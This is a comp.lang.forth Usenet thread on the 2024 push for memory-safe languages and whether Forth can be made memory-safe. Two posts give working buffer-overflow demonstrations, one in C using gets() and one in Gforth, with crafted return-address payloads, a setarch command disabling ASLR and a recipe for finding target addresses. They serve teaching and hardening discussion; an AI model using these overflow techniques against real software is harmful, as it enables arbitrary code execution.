• push for memory safe languages -- impact on Forth

    From Krishna Myneni@21:1/5 to All on Fri Mar 1 09:54:36 2024
    I'm wondering what the CS Forth users and Forth systems developers make
    of the renewed recent push for use of memory-safe languages. Certainly
    Forth can add the type of contractual safety requirements e.g.,
    implementing bounds checking, of a "memory-safe language". Do we need to
    work on libraries for these provisions?

    Opinions?

    --
    Krishna Myneni

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to mhx on Fri Mar 1 10:53:57 2024
    On 3/1/24 10:37, mhx wrote:
    What if the program writes a float to a byte location?

    Do we have to go along and make Forth type-safe then?


    We don't have to go along with anything. However, it might be useful to consider how we can satisfy some of the concerns. It is not possible to separate entirely memory safe from type safe, since an array of bytes
    doesn't have the same memory bounds as an array of floats. Nevertheless
    index checking would be the same in both cases.

    --
    Krishna

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From mhx@21:1/5 to All on Fri Mar 1 16:37:13 2024
    What if the program writes a float to a byte location?

    Do we have to go along and make Forth type-safe then?

    -marcel

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Krishna Myneni on Fri Mar 1 17:38:02 2024
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    I'm wondering what the CS Forth users and Forth systems developers make
    of the renewed recent push for use of memory-safe languages.

    Which "renewed recent push" do you mean?

    Certainly
    Forth can add the type of contractual safety requirements e.g.,
    implementing bounds checking, of a "memory-safe language". Do we need to
    work on libraries for these provisions?

    Some years ago I thought that we can make do by providing some kind of
    secure dialect of standard Forth (with some additional words, and an
    escape hatch to full Forth) [ertl-secure16]. But the secure dialect
    was not intended to be watertight, only protect against mistakes.

    In the meantime, I know more about the topic and think that it's
    better to produce a watertight secure dialect (with an escape hatch).
    Other people have been earlier in recognizing that and have created
    Forth systems like Oforth or Eight. My own contribution to that
    topic, Safe Forth [ertl22] is a paper design for now, but has the
    selling point of requiring neither type tagging nor static type
    checking.

    I have not had any resonance wrt what I proposed in 2016. For my 2022
    ideas, I have had one request on whether there already exists an implementation.

    @InProceedings{ertl-secure16,
    author = {M. Anton Ertl},
    title = {Security},
    crossref = {euroforth16},
    pages = {82--83},
    url = {http://www.euroforth.org/ef16/papers/ertl-secure.pdf},
    video = {https://wiki.forth-ev.de/lib/exe/fetch.php/events:security.mp4},
    OPTnote = {presentation slides}
    }
    @Proceedings{euroforth16,
    title = {32nd EuroForth Conference},
    booktitle = {32nd EuroForth Conference},
    year = {2016},
    key = {EuroForth'16},
    url = {http://www.complang.tuwien.ac.at/anton/euroforth/ef16/papers/proceedings.pdf}
    }

    @InProceedings{ertl22,
    author = {M. Anton Ertl},
    title = {Memory Safety Without Tagging nor Static Type Checking},
    crossref = {euroforth22},
    pages = {5--15},
    url = {http://www.euroforth.org/ef22/papers/ertl.pdf},
    url-slides = {http://www.euroforth.org/ef22/papers/ertl-slides.pdf},
    video = {https://www.youtube.com/watch?v=pReEJinuxEI},
    OPTnote = {refereed},
    abstract = {A significant proportion of vulnerabilities are due
    to memory accesses (typically in C code) that
    memory-safe languages like Java prevent. This paper
    discusses a new approach to modifying Forth for
    memory-safety: Eliminate addresses from the data
    stack; instead, put object references on a separate
    object stack and use \code{value}-flavoured words.
    This approach avoids the complexity of static type
    checking (used in, e.g., Java and Factor), and also
    avoids the performance overhead of dynamic type
    checking for non-memory operations. This paper
    discusses the consequences of this approach on the
    language, and on performance.}
    }

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to mhx on Fri Mar 1 18:02:10 2024
    mhx@iae.nl (mhx) writes:
    What if the program writes a float to a byte location?

    That's not a safety problem (as long as the location is big enough for
    the float), so one can design a Safe Forth variant that allows that.
    But once you are already implementing all the Safety features, it's
    relatively easy to prevent that, too. But of course, if you find that
    you need that, you can add a word that does that without subverting
    memory safety.

    Do we have to go along and make Forth type-safe then?

    For memory safety, you certainly need a way to differentiate between
    addresses and other data. Some programming languages use type
    checkers for that, some use tagging. Safe Forth uses separate stacks.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to All on Fri Mar 1 17:42:08 2024
    Forth by design is as unsafe as any assembler.
    The only way to tame it is to run it in a black box.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to minforth on Fri Mar 1 12:42:31 2024
    On 3/1/24 11:42, minforth wrote:
    Forth by design is as unsafe as any assembler. The only way to tame it
    is to run it in a black box.

    We may have an alternative, when necessary. The malleability of the
    language lends itself to interfaces which can enforce memory safety.
    Even without changes to the language itself, memory safety might be
    provided by a library e.g. typed arrays, as long as one sticks to the
    designed interface.

    --
    Krishna

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to Anton Ertl on Fri Mar 1 12:38:59 2024
    On 3/1/24 11:38, Anton Ertl wrote:
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    I'm wondering what the CS Forth users and Forth systems developers make
    of the renewed recent push for use of memory-safe languages.

    Which "renewed recent push" do you mean?


    the ones that Paul Rubin mentioned.

    --
    km

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to Anton Ertl on Fri Mar 1 10:17:36 2024
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    of the renewed recent push for use of memory-safe languages.
    Which "renewed recent push" do you mean?

    https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages

    https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to All on Fri Mar 1 19:46:55 2024
    IMO you would just be creating another stack language, even if it just
    looks like another Forth dialect from the outside.

    If I need a relatively safe programming language, I would use SPARK.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to Paul Rubin on Fri Mar 1 15:47:42 2024
    On 3/1/24 12:17, Paul Rubin wrote:
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    of the renewed recent push for use of memory-safe languages.
    Which "renewed recent push" do you mean?

    https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages

    https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/

    From the second link,

    "While memory safe hardware and formal methods can be excellent
    complementary approaches to mitigating undiscovered vulnerabilities, one
    of the most impactful actions software and hardware manufacturers can
    take is adopting memory safe programming languages. They offer a way to eliminate, not just mitigate, entire bug classes. This is a remarkable opportunity for the technical community to improve the cybersecurity of
    the entire digital ecosystem."

    It sounds like there are plans to use Rust for some of the Linux kernel
    code.

    --
    KM

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to Krishna Myneni on Fri Mar 1 23:16:53 2024
    On 3/1/24 09:54, Krishna Myneni wrote:
    I'm wondering what the CS Forth users and Forth systems developers make
    of the renewed recent push for use of memory-safe languages. Certainly
    Forth can add the type of contractual safety requirements e.g.,
    implementing bounds checking, of a "memory-safe language". Do we need to
    work on libraries for these provisions?

    Opinions?


    I played with a simple buffer overflow attack code in C, based on an
    example I found at

    https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf

    === begin code ===
    /*
    Demonstrate buffer overflow exploit.
    Adapted from the example at:

    https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf

    Build with:
    gcc -m32 -o exploit_demo exploit_demo.c

    Normal run:
    printf "abcdefg" | ./exploit_demo

    Find the address of MaliciousCode() within the disassembled executable
    objdump -S ./exploit_demo

    from the listing above, note the 4-byte address of MaliciousCode
    and put the address in the input string, from low-byte to high-byte.

    Exploit Example: pass a string to overflow the buffer and run
    exploit code
    printf "abcdefghijklmnopqrst\x96\x91\x04\x08" | ./exploit_demo

    replace the address 0x08049186 above with the one you obtained
    from objdump command.

    The exploit will cause MaliciousCode() to execute.
    */

    #include <stdio.h>
    #include <stdlib.h>

    void MaliciousCode() {
    printf("This code is malicious!\n");
    printf("It will not execute normally.\n");
    exit(0);
    }

    void GetInput() {
    char buffer[8];
    gets(buffer);
    // puts(buffer);
    }

    int main() {
    GetInput();
    return 0;
    }
    === end code ===

    It will be a useful exercise to work up a similar example in Forth, as a
    step to thinking about automatic hardening techniques (as opposed to
    input sanitization).

    --
    Krishna

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Krishna Myneni on Sat Mar 2 08:04:01 2024
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    #include <stdio.h>
    #include <stdlib.h>

    void MaliciousCode() {
    printf("This code is malicious!\n");
    printf("It will not execute normally.\n");
    exit(0);
    }

    void GetInput() {
    char buffer[8];
    gets(buffer);
    // puts(buffer);
    }

    int main() {
    GetInput();
    return 0;
    }
    === end code ===

    It will be a useful exercise to work up a similar example in Forth, as a
    step to thinking about automatic hardening techniques (as opposed to
    input sanitization).

    Forth does not have an inherently unbounded input word like C's
    gets(). And even typical C environments warn you when you compile
    this code; e.g., when I compile it on Debian 11, I get:

    gcc xxx.c
    |xxx.c: In function ‘GetInput’:
    |xxx.c:12:10: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
    | 12 | gets(buffer);
    | | ^~~~
    | | fgets
    |/usr/bin/ld: /tmp/ccC9Qbu7.o: in function `GetInput':
    |xxx.c:(.text+0x3b): warning: the `gets' function is dangerous and should not be used.

    So, they removed gets() from stdio.h, and added a warning to the
    linker. "man gets" tells me:

    |_Never use this function_
    |[...]
    |ISO C11 removes the specification of gets() from the C language, and
    |since version 2.16, glibc header files don't expose the function
    |declaration if the _ISOC11_SOURCE feature test macro is defined.

    And when I follow the recipe in the comments, the result is a
    segmentation fault. Things like ASLR prevent such easy ways to
    reliably perform arbitrary code execution. The attacker still might
    try to repeat the attack using one of the possible target addresses,
    and eventually the random-number generator will actually produce the
    layout that the exploit is designed for. Moreover, attackers have
    found other, less time-consuming ways to cope with ASLR. Bottom line:
    ASLR makes attacks harder, but it does not prevent them.

    Anyway, there are plenty of ways to corrupt a Forth system, e.g., by
    using MOVE in an unsafe way, or by using (the non-standard) PLACE or
    +PLACE with a target buffer that's smaller then 256 bytes (and for
    +PLACE, I would not be surprised if there are implementations around
    that even write beyond the 256-byte boundary).

    If you want an example, here's one that targets the Gforth version I
    am currently working with:

    : MaliciousCode ( -- )
    ." This code is malicious!" cr
    ." It will not execute normally." cr
    bye ;

    create buffer1 8 allot

    :noname buffer1 96 stdin read-line . ; execute
    bye

    When I put this into a file xploit.fs and then perform

    printf "01234567890123456789012345678901234567890123456789012345678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc\xed\xe9\xff\x7f\x00\x00"|
    setarch `uname -m` -R gforth xploit.fs

    I get the following output:

    This code is malicious!
    It will not execute normally.

    Here the "setarch `uname -m` -R" is used to disable ASLR. Attackers
    typically have no way to run programs this way (or if they have, they
    don't need such an exploit to execute arbitrary code), but they have
    other ways to work around ASLR.

    In the example above the mistake is easy to see, but these kinds of
    mistakes still happen.

    It would be safer if we had the convention that buffers are always
    passed around with their lengths. Then we could have a defining word

    safebuffer ( u "name" -- )
    \ name execution: ( -- addr u )

    and in the code above one would write

    8 safebuffer buffer1

    :noname buffer1 stdin read-line . ; execute
    bye

    and there could not be a buffer overflow exploit.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From albert@spenarnc.xs4all.nl@21:1/5 to krishna.myneni@ccreweb.org on Sat Mar 2 10:41:10 2024
    In article <urstns$1ab0f$1@dont-email.me>,
    Krishna Myneni <krishna.myneni@ccreweb.org> wrote:
    I'm wondering what the CS Forth users and Forth systems developers make
    of the renewed recent push for use of memory-safe languages. Certainly
    Forth can add the type of contractual safety requirements e.g.,
    implementing bounds checking, of a "memory-safe language". Do we need to
    work on libraries for these provisions?

    Opinions?

    There is no way Forth can be a safe language in the sense of algol/pascal/ada/go.
    It is in the lane of assembler/Fortran/c.
    The most that can be done implement a safe language on top of it,
    that makes not a lot of sense.

    Krishna Myneni
    Groetjes Albert
    --
    Don't praise the day before the evening. One swallow doesn't make spring.
    You must not say "hey" before you have crossed the bridge. Don't sell the
    hide of the bear until you shot it. Better one bird in the hand than ten in
    the air. First gain is a cat purring. - the Wise from Antrim -

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From albert@spenarnc.xs4all.nl@21:1/5 to dxforth@gmail.com on Sat Mar 2 10:47:18 2024
    In article <65e2c0f3$1@news.ausics.net>, dxf <dxforth@gmail.com> wrote:
    On 2/03/2024 5:17 am, Paul Rubin wrote:
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    of the renewed recent push for use of memory-safe languages.
    Which "renewed recent push" do you mean?

    https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages

    https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/

    It's good to have an application that works as planned but how does one
    that misbehaves translate to 'security risk' and how does 'memory-safe' >prevent that?

    "ONCD has the belief that better metrics enable technology providers to
    better plan, anticipate, and mitigate vulnerabilities before they become
    a problem."

    That may be their belief (fancy word for hope) but do they have anything
    to back it up?


    Most Forthers have a blind spot what safe means.
    I grew up with algol60. The only errors you encountered were
    array index errors, and memory exhausted. Index errors showed what array
    the index, and a call tree. Memory exhausted indicates that you have
    infinite recursion.
    On the other hand FORTRAN programs showed an hex address and a dump of
    the internal registers.

    Groetjes Albert
    --
    Don't praise the day before the evening. One swallow doesn't make spring.
    You must not say "hey" before you have crossed the bridge. Don't sell the
    hide of the bear until you shot it. Better one bird in the hand than ten in
    the air. First gain is a cat purring. - the Wise from Antrim -

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Anton Ertl on Sat Mar 2 09:57:01 2024
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    If you want an example, here's one that targets the Gforth version I
    am currently working with:

    : MaliciousCode ( -- )
    ." This code is malicious!" cr
    ." It will not execute normally." cr
    bye ;

    create buffer1 8 allot

    :noname buffer1 96 stdin read-line . ; execute
    bye

    When I put this into a file xploit.fs and then perform

    printf "01234567890123456789012345678901234567890123456789012345678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc\xed\xe9\xff\x7f\x00\x00"|
    setarch `uname -m` -R gforth xploit.fs

    I get the following output:

    This code is malicious!
    It will not execute normally.

    I forgot to give a recipe for the printf above:

    insert

    ' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop

    right before the execute, and the dumps contain the bytes you have to
    put into the printf after the 80th byte, in that order. I.e.:

    : MaliciousCode ( -- )
    ." This code is malicious!" cr
    ." It will not execute normally." cr
    bye ;

    create buffer1 8 allot

    :noname buffer1 96 stdin read-line . ;
    ' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop
    execute
    bye

    and run it with

    echo|setarch `uname -m` -R gforth xploit.fs gforth xploit.fs

    For the particular Gforth at hand, this produces:

    7FFFE9E43160: 33 5B 57 55 55 55 00 00 - 3[WUUU..

    7FFFE9AF6FF0: 68 DC ED E9 FF 7F 00 00 - h.......

    exactly the bytes in the printf above.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to Anton Ertl on Sat Mar 2 06:18:41 2024
    On 3/2/24 03:57, Anton Ertl wrote:
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    If you want an example, here's one that targets the Gforth version I
    am currently working with:

    : MaliciousCode ( -- )
    ." This code is malicious!" cr
    ." It will not execute normally." cr
    bye ;

    create buffer1 8 allot

    :noname buffer1 96 stdin read-line . ; execute
    bye

    When I put this into a file xploit.fs and then perform

    printf "01234567890123456789012345678901234567890123456789012345678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc\xed\xe9\xff\x7f\x00\x00"|
    setarch `uname -m` -R gforth xploit.fs

    I get the following output:

    This code is malicious!
    It will not execute normally.

    I forgot to give a recipe for the printf above:

    insert

    ' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop

    right before the execute, and the dumps contain the bytes you have to
    put into the printf after the 80th byte, in that order. I.e.:

    : MaliciousCode ( -- )
    ." This code is malicious!" cr
    ." It will not execute normally." cr
    bye ;

    create buffer1 8 allot

    :noname buffer1 96 stdin read-line . ;
    ' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop
    execute
    bye

    and run it with

    echo|setarch `uname -m` -R gforth xploit.fs gforth xploit.fs

    For the particular Gforth at hand, this produces:

    7FFFE9E43160: 33 5B 57 55 55 55 00 00 - 3[WUUU..

    7FFFE9AF6FF0: 68 DC ED E9 FF 7F 00 00 - h.......

    exactly the bytes in the printf above.


    Nice example. I can't reproduce it with an older version of gforth (0.7.9_20220120), but the proof of concept attack is going to be Forth system-dependent.

    Curious as to why you did not use standard ACCEPT for the illustration.

    --
    Krishna

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to Krishna Myneni on Sat Mar 2 06:41:57 2024
    On 3/1/24 23:16, Krishna Myneni wrote:
    On 3/1/24 09:54, Krishna Myneni wrote:
    I'm wondering what the CS Forth users and Forth systems developers
    make of the renewed recent push for use of memory-safe languages.
    Certainly Forth can add the type of contractual safety requirements
    e.g., implementing bounds checking, of a "memory-safe language". Do we
    need to work on libraries for these provisions?

    Opinions?


    I played with a simple buffer overflow attack code in C, based on an
    example I found at

    https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf

    === begin code ===
    /*
       Demonstrate buffer overflow exploit.
       Adapted from the example at:

    https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf

       Build with:
          gcc -m32 -o exploit_demo exploit_demo.c

       Normal run:
          printf "abcdefg" | ./exploit_demo

       Find the address of MaliciousCode() within the disassembled executable
          objdump -S ./exploit_demo

          from the listing above, note the 4-byte address of MaliciousCode
          and put the address in the input string, from low-byte to high-byte.

       Exploit Example: pass a string to overflow the buffer and run
    exploit code
          printf "abcdefghijklmnopqrst\x96\x91\x04\x08" | ./exploit_demo

          replace the address 0x08049186 above with the one you obtained
          from objdump command.

       The exploit will cause MaliciousCode() to execute.
    */

    #include <stdio.h>
    #include <stdlib.h>

    void MaliciousCode() {
            printf("This code is malicious!\n");
            printf("It will not execute normally.\n");
            exit(0);
    }

    void GetInput() {
            char buffer[8];
            gets(buffer);
            // puts(buffer);
    }

    int main() {
            GetInput();
            return 0;
    }
    === end code ===

    It will be a useful exercise to work up a similar example in Forth, as a
    step to thinking about automatic hardening techniques (as opposed to
    input sanitization).

    --
    Krishna






    Here's the output from two runs of the executable, the first with no
    buffer overflow, and the second with buffer overflow.

    === begin test output ===
    $ printf "abcdefg" | ./exploit_demo

    $ printf "abcdefghijklmnopqrst\x96\x91\x04\x08" | ./exploit_demo
    This code is malicious!
    It will not execute normally.
    $
    === end test output ===

    I am using Fedora release 39, kernel version 6.7.5-200.fc39.x86_64, and
    gcc version gcc (GCC) 13.2.1 20231205 (Red Hat 13.2.1-6)

    --
    Krishna

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to dxf on Sat Mar 2 08:35:25 2024
    On 3/2/24 00:02, dxf wrote:
    On 2/03/2024 5:17 am, Paul Rubin wrote:
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    of the renewed recent push for use of memory-safe languages.
    Which "renewed recent push" do you mean?

    https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages

    https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/

    It's good to have an application that works as planned but how does one
    that misbehaves translate to 'security risk' and how does 'memory-safe' prevent that?

    See my example in C where a buffer overflow is exploited to run code
    which would not ever be called for normal execution.

    Also, see Anton's example in Gforth.

    --
    Krishna

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to minforth on Sat Mar 2 10:08:53 2024
    On 3/2/24 09:39, minforth wrote:
    Harden these without runtime checks:
    : RT1 2 3e recurse ;
    : RT2 drop fdrop recurse ;

    Let's see what python does:

    def rt1():
    return rt1()

    rt1()
    Traceback (most recent call last):
    File "<stdin>", line 1, in <module>
    File "<stdin>", line 2, in rt1
    File "<stdin>", line 2, in rt1
    File "<stdin>", line 2, in rt1
    [Previous line repeated 996 more times]
    RecursionError: maximum recursion depth exceeded

    Clearly it is doing a runtime check. Similarly one could have RECURSE in
    Forth perform a runtime check to enforce a recursion depth limit, and
    indeed this type of error is caught by several Forth systems:

    === kForth example ===
    : rt1 recurse ;
    ok
    rt1
    Line 2: VM Error(-258): Return stack corrupt
    rt1
    === end example ===

    === Gforth example ===
    : rt1 recurse ; ok
    rt1
    *the terminal*:2:1: error: Return stack overflow
    rt1<<<
    === end example ===

    --
    Krishna

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to All on Sat Mar 2 15:39:11 2024
    Harden these without runtime checks:
    : RT1 2 3e recurse ;
    : RT2 drop fdrop recurse ;

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to minforth on Sat Mar 2 16:36:26 2024
    minforth@gmx.net (minforth) writes:
    Harden these without runtime checks:
    : RT1 2 3e recurse ;
    : RT2 drop fdrop recurse ;

    Depends on what you mean with "runtime checks". Gforth does not
    compile extra code for stack depth checks, and yet:

    : RT1 2 3e recurse ; ok
    : RT2 drop fdrop recurse ; ok
    rt1
    *the terminal*:3:1: error: Floating-point stack overflow
    rt1<<<
    rt2
    *the terminal*:4:1: error: Stack underflow
    rt2<<<

    Here's the code for the two words:

    see-code rt1
    $7FEEF9B56C60 lit 1->1
    $7FEEF9B56C68 #2
    7FEEF97FB523: mov $00[r13],r8
    7FEEF97FB527: sub r13,$08
    7FEEF97FB52B: mov r8,$08[rbx]
    $7FEEF9B56C70 flit 1->1
    $7FEEF9B56C78 #4613937818241073152
    7FEEF97FB52F: add rbx,$20
    7FEEF97FB533: movsd [r12],xmm15
    7FEEF97FB539: movsd xmm15,-$08[rbx]
    7FEEF97FB53F: sub r12,$08
    $7FEEF9B56C80 call 1->1
    $7FEEF9B56C88 RT1
    7FEEF97FB543: mov rax,$08[rbx]
    7FEEF97FB547: sub r14,$08
    7FEEF97FB54B: add rbx,$10
    7FEEF97FB54F: mov [r14],rbx
    7FEEF97FB552: mov rbx,rax
    7FEEF97FB555: mov rax,[rbx]
    7FEEF97FB558: jmp eax
    $7FEEF9B56C90 ;s 1->1
    7FEEF97FB55A: mov rbx,[r14]
    7FEEF97FB55D: add r14,$08
    7FEEF97FB561: mov rax,[rbx]
    7FEEF97FB564: jmp eax
    ok
    see-code rt2
    $7FEEF9B56CC0 drop 1->1
    7FEEF97FB566: mov r8,$08[r13]
    7FEEF97FB56A: add r13,$08
    $7FEEF9B56CC8 fdrop 1->1
    7FEEF97FB56E: mov rax,r12
    7FEEF97FB571: lea r12,$08[r12]
    7FEEF97FB576: movsd xmm15,$08[rax]
    $7FEEF9B56CD0 call 1->1
    $7FEEF9B56CD8 RT2
    7FEEF97FB57C: mov rax,$18[rbx]
    7FEEF97FB580: sub r14,$08
    7FEEF97FB584: add rbx,$20
    7FEEF97FB588: mov [r14],rbx
    7FEEF97FB58B: mov rbx,rax
    7FEEF97FB58E: mov rax,[rbx]
    7FEEF97FB591: jmp eax
    $7FEEF9B56CE0 ;s 1->1
    7FEEF97FB593: mov rbx,[r14]
    7FEEF97FB596: add r14,$08
    7FEEF97FB59A: mov rax,[rbx]
    7FEEF97FB59D: jmp eax

    Look, Ma, no software run-time checks. It's done with the MMU
    hardware.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Krishna Myneni on Sat Mar 2 16:43:10 2024
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    On 3/2/24 10:08, Krishna Myneni wrote:
    === Gforth example ===
    : rt1 recurse ;  ok
    rt1
    *the terminal*:2:1: error: Return stack overflow
    rt1<<<
    === end example ===


    To be clear, if you try to fill up the fp or data stack, as with your
    rt1 example, kForth does give a segfault (and hence is susceptible to an >exploit), while Gforth still gives the same error.

    In Gforth on a Unix system, Unix produces a SIGSEGV when a stack runs
    into a guard page. The signal handler then looks at the offending
    address, and guesses that an access close to the bottom of a stack is
    an underflow of that stack, and correspondingly for accesses close to
    the top of a stack. This can be seen as follows:

    With the gforth engine with the FP stack being empty:

    fp@ 32769 - c@
    *the terminal*:3:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<
    fp@ 1+ c@
    *the terminal*:4:8: error: Floating-point stack underflow
    fp@ 1+ >>>c@<<<

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to Krishna Myneni on Sat Mar 2 10:17:57 2024
    On 3/2/24 10:08, Krishna Myneni wrote:
    On 3/2/24 09:39, minforth wrote:
    Harden these without runtime checks:
    : RT1 2 3e recurse ;
    : RT2 drop fdrop recurse ;

    Let's see what python does:

    def rt1():
       return rt1()

    rt1()
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
      File "<stdin>", line 2, in rt1
      File "<stdin>", line 2, in rt1
      File "<stdin>", line 2, in rt1
      [Previous line repeated 996 more times]
    RecursionError: maximum recursion depth exceeded

    Clearly it is doing a runtime check. Similarly one could have RECURSE in Forth perform a runtime check to enforce a recursion depth limit, and
    indeed this type of error is caught by several Forth systems:

    === kForth example ===
    : rt1 recurse ;
     ok
    rt1
    Line 2:  VM Error(-258): Return stack corrupt
    rt1
    === end example ===

    === Gforth example ===
    : rt1 recurse ;  ok
    rt1
    *the terminal*:2:1: error: Return stack overflow
    rt1<<<
    === end example ===


    To be clear, if you try to fill up the fp or data stack, as with your
    rt1 example, kForth does give a segfault (and hence is susceptible to an exploit), while Gforth still gives the same error.

    --
    Krishna

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to Anton Ertl on Sat Mar 2 11:18:14 2024
    On 3/2/24 10:43, Anton Ertl wrote:
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    On 3/2/24 10:08, Krishna Myneni wrote:
    === Gforth example ===
    : rt1 recurse ;  ok
    rt1
    *the terminal*:2:1: error: Return stack overflow
    >>>rt1<<<
    === end example ===


    To be clear, if you try to fill up the fp or data stack, as with your
    rt1 example, kForth does give a segfault (and hence is susceptible to an
    exploit), while Gforth still gives the same error.

    In Gforth on a Unix system, Unix produces a SIGSEGV when a stack runs
    into a guard page. The signal handler then looks at the offending
    address, and guesses that an access close to the bottom of a stack is
    an underflow of that stack, and correspondingly for accesses close to
    the top of a stack. This can be seen as follows:

    With the gforth engine with the FP stack being empty:

    fp@ 32769 - c@
    *the terminal*:3:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<
    fp@ 1+ c@
    *the terminal*:4:8: error: Floating-point stack underflow
    fp@ 1+ >>>c@<<<


    Nice. The use of guard pages is something I need to look into to avoid
    memory leaks or corruption for the stacks. Does this mean Gforth is
    immune to arbitrary code execution attacks for the fp and data stack
    overflow and underflow conditions?

    --
    Krishna

